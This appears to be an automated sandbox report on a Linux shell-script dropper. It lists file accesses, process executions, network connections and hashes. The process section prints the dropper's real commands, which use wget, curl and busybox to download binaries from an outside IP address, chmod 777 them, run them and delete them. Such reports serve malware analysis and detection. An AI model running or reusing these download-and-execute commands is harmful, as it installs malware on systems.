| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /usr/bin/curl | N/A |
Processes
/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
[/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/chmod
[chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ
[./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/rm
[rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/chmod
[chmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT
[./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/rm
[rm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/wget
[wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/chmod
[chmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s
[./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/rm
[rm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/usr/bin/wget
[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/chmod
[chmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4
[./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/rm
[rm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/wget
[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/chmod
[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk
[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/rm
[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/wget
[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/chmod
[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m
[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/rm
[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/wget
[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/chmod
[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q
[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/rm
[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/wget
[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/chmod
[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM
[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/rm
[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/wget
[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/chmod
[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5
[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/rm
[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/chmod
[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv
[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/rm
[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/wget
[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/chmod
[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj
[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/rm
[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/wget
[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/chmod
[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI
[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/rm
[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/chmod
[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh
[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/rm
[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/wget
[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/chmod
[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy
[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/rm
[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/wget
[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/chmod
[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5
[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/rm
[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/wget
[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/chmod
[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk
[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/rm
[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/wget
[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/chmod
[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m
[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/rm
[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/wget
[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/chmod
[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q
[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/rm
[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/wget
[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/chmod
[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM
[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/rm
[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/wget
[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/chmod
[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv
[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/rm
[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/wget
[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/chmod
[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy
[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/rm
[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/wget
[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/chmod
[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj
[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/rm
[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/wget
[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/chmod
[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI
[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/rm
[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/chmod
[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh
[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/rm
[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/wget
[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/chmod
[chmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4
[./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/rm
[rm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/wget
[wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/chmod
[chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ
[./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/rm
[rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/chmod
[chmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT
[./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/rm
[rm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/wget
[wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/chmod
[chmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s
[./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/rm
[rm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
